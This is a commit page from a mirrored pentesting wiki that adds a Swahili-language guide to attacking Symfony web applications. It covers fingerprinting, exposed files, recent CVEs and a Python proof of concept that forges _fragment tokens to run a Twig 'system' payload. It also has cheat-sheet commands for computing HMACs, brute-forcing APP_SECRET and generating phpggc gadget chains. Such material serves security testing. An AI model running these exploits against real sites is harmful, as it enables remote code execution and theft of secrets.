maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/network-services-pentesting/pentesting-web/symphony.md'

Browse Source
This commit is contained in:
Translator 2025-07-23 10:25:30 +00:00
parent 5497ac0113
commit 63283f24db
1 changed files with 117 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

121
src/network-services-pentesting/pentesting-web/symphony.md
View File

@ -2,10 +2,123 @@
{{#include ../../banners/hacktricks-training.md}}
Angalia machapisho yafuatayo:
Symfony ni moja ya mifumo maarufu zaidi ya PHP na mara kwa mara inaonekana katika tathmini za malengo ya biashara, e-commerce na CMS (Drupal, Shopware, Ibexa, OroCRM … zote zinajumuisha vipengele vya Symfony). Ukurasa huu unakusanya vidokezo vya mashambulizi, makosa ya kawaida ya usanidi na udhaifu wa hivi karibuni unapaswa kuwa kwenye orodha yako ya ukaguzi unapogundua programu ya Symfony.
- [**https://www.ambionics.io/blog/symfony-secret-fragment**](https://www.ambionics.io/blog/symfony-secret-fragment)
- [**hhttps://blog.flatt.tech/entry/2020/11/02/124807**](https://blog.flatt.tech/entry/2020/11/02/124807)
- [**https://infosecwriteups.com/how-i-was-able-to-find-multiple-vulnerabilities-of-a-symfony-web-framework-web-application-2b82cd5de144**](https://infosecwriteups.com/how-i-was-able-to-find-multiple-vulnerabilities-of-a-symfony-web-framework-web-application-2b82cd5de144)
> Kumbukumbu ya kihistoria: Sehemu kubwa ya mfumo bado inatumia tawi la **5.4 LTS** (EOL **Novemba 2025**). Daima thibitisha toleo halisi la chini kwa sababu ya taarifa nyingi za usalama za 2023-2025 ambazo zilitatuliwa tu katika toleo za patch (mfano 5.4.46 → 5.4.50).
---
## Recon & Enumeration
### Finger-printing
* Vichwa vya majibu ya HTTP: `X-Powered-By: Symfony`, `X-Debug-Token`, `X-Debug-Token-Link` au vidakuzi vinavyoanza na `sf_redirect`, `sf_session`, `MOCKSESSID`.
* Mvuvi wa msimbo wa chanzo (`composer.json`, `composer.lock`, `/vendor/…`) mara nyingi huonyesha toleo halisi:
```bash
curl -s https://target/vendor/composer/installed.json | jq '.[] | select(.name|test("symfony/")) | .name,.version'
```
* Njia za umma ambazo zipo tu kwenye Symfony:
* `/_profiler` (Symfony **Profiler** & toolbar ya debug)
* `/_wdt/<token>` (“Web Debug Toolbar”)
* `/_error/{code}.{_format}` (kurasa za makosa nzuri)
* `/app_dev.php`, `/config.php`, `/config_dev.php` (wasimamizi wa mbele wa dev kabla ya 4.0)
* Wappalyzer, BuiltWith au orodha za maneno za ffuf/feroxbuster: `symfony.txt` → angalia `/_fragment`, `/_profiler`, `.env`, `.htaccess`.
### Faili & mwisho wa kuvutia
| Njia | Kwa nini ni muhimu |
|------|----------------|
| `/.env`, `/.env.local`, `/.env.prod` | Mara nyingi huwekwa vibaya → inavuja `APP_SECRET`, DB creds, SMTP, funguo za AWS |
| `/.git`, `.svn`, `.hg` | Ufunuo wa chanzo → akidi + mantiki ya biashara |
| `/var/log/*.log`, `/log/dev.log` | Usanidi mbaya wa mizizi ya wavuti unaonyesha stack-traces |
| `/_profiler` | Historia kamili ya maombi, usanidi, chombo cha huduma, **APP_SECRET** (≤ 3.4) |
| `/_fragment` | Kituo cha kuingia kinachotumiwa na ESI/HInclude. Unyanyasaji unawezekana mara tu unajua `APP_SECRET` |
| `/vendor/phpunit/phpunit/phpunit` | PHPUnit RCE ikiwa inapatikana (CVE-2017-9841) |
| `/index.php/_error/{code}` | Finger-print & wakati mwingine inavuja nyaraka za makosa |
---
## Udhaifu wa Juu (2023-2025)
### 1. Ufunuo wa APP_SECRET ➜ RCE kupitia `/_fragment` (pia inajulikana kama “secret-fragment”)
* **CVE-2019-18889** awali, lakini *bado* inaonekana kwenye malengo ya kisasa wakati debug imeachwa ikiwa hai au `.env` inafichuliwa.
* Mara tu unavyojua `APP_SECRET` ya herufi 32, tengeneza token ya HMAC na unyanyasaji chombo cha ndani `render()` ili kutekeleza Twig isiyo ya kawaida:
```python
# PoC inahitaji siri
import hmac, hashlib, requests, urllib.parse as u
secret = bytes.fromhex('deadbeef…')
payload = "{{['id']|filter('system')}}" # RCE katika Twig
query = {
'template': '@app/404.html.twig',
'filter': 'raw',
'_format': 'html',
'_locale': 'en',
'globals[cmd]': 'id'
}
qs = u.urlencode(query, doseq=True)
token = hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest()
r = requests.get(f"https://target/_fragment?{qs}&_token={token}")
print(r.text)
```
* Andiko bora na skripti ya unyanyasaji: blog ya Ambionics (iliyojumuishwa katika Marejeleo).
### 2. Windows Process Hijack CVE-2024-51736
* Kipengele cha `Process` kilitafuta saraka ya kazi ya sasa **kabla** ya `PATH` kwenye Windows. Mshambuliaji anayeweza kupakia `tar.exe`, `cmd.exe`, nk. katika mizizi ya wavuti inayoweza kuandikwa na kuanzisha `Process` (mfano, uondoaji wa faili, uzalishaji wa PDF) anapata utekelezaji wa amri.
* Imefanyiwa marekebisho katika 5.4.50, 6.4.14, 7.1.7.
### 3. Session-Fixation CVE-2023-46733
* Mlinzi wa uthibitishaji alitumia kitambulisho cha kikao kilichopo baada ya kuingia. Ikiwa mshambuliaji anaweka cookie **kabla** ya mwathirika kujiandikisha, wanachukua akaunti baada ya kuingia.
### 4. Twig sandbox XSS CVE-2023-46734
* Katika programu zinazofichua templeti zinazodhibitiwa na mtumiaji (CMS ya admin, mjenzi wa barua pepe) chujio cha `nl2br` kinaweza kutumiwa vibaya ili kupita sandbox na kuingiza JS.
### 5. Symfony 1 gadget chains (bado zinapatikana katika programu za urithi)
* `phpggc symfony/1 system id` inazalisha payload ya Phar inayosababisha RCE wakati `unserialize()` inatokea kwenye madarasa kama `sfNamespacedParameterHolder`. Angalia mwisho wa kupakia faili na vifungashio vya `phar://`.
{{#ref}}
../../pentesting-web/deserialization/php-deserialization-+-autoload-classes.md
{{#endref}}
---
## Cheat-Sheet ya Unyanyasaji
### Hesabu token ya HMAC kwa `/_fragment`
```bash
python - <<'PY'
import sys, hmac, hashlib, urllib.parse as u
secret = bytes.fromhex(sys.argv[1])
qs = u.quote_plus(sys.argv[2], safe='=&')
print(hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest())
PY deadbeef… "template=@App/evil&filter=raw&_format=html"
```
### Bruteforce dhaifu `APP_SECRET`
```bash
cewl -d3 https://target -w words.txt
symfony-secret-bruteforce.py -w words.txt -c abcdef1234567890 https://target
```
### RCE kupitia Symfony Console iliyo wazi
Ikiwa `bin/console` inapatikana kupitia `php-fpm` au upakuaji wa moja kwa moja wa CLI:
```bash
php bin/console about # confirm it works
php bin/console cache:clear --no-warmup
```
Tumia gadgets za deserialization ndani ya directory ya cache au andika template mbaya ya Twig ambayo itatekelezwa kwenye ombi linalofuata.
---
## Maelezo ya kujihami
1. **Usiweke debug** (`APP_ENV=dev`, `APP_DEBUG=1`) kwenye uzalishaji; zuia `/app_dev.php`, `/_profiler`, `/_wdt` katika usanidi wa seva ya wavuti.
2. Hifadhi siri katika env vars au `vault/secrets.local.php`, *kamwe* si katika faili zinazopatikana kupitia mizizi ya hati.
3. Lazimisha usimamizi wa patch jiandikishe kwa matangazo ya usalama ya Symfony na uweke angalau kiwango cha LTS patch.
4. Ikiwa unatumia Windows, sasisha mara moja ili kupunguza CVE-2024-51736 au ongeza ulinzi wa `open_basedir`/`disable_functions`.
---
### Zana za mashambulizi zinazofaa
* **ambionics/symfony-exploits** RCE ya kipande-siri, ugunduzi wa njia za debugger.
* **phpggc** Mifumo ya gadget iliyotengenezwa tayari kwa Symfony 1 & 2.
* **sf-encoder** msaidizi mdogo wa kuhesabu `_fragment` HMAC (uteuzi wa Go).
## Marejeleo
* [Ambionics Symfony “secret-fragment” Remote Code Execution](https://www.ambionics.io/blog/symfony-secret-fragment)
* [Symfony Security Advisory CVE-2024-51736: Command Execution Hijack on Windows Process Component](https://symfony.com/blog/cve-2024-51736-command-execution-hijack-on-windows-with-process-class)
{{#include ../../banners/hacktricks-training.md}}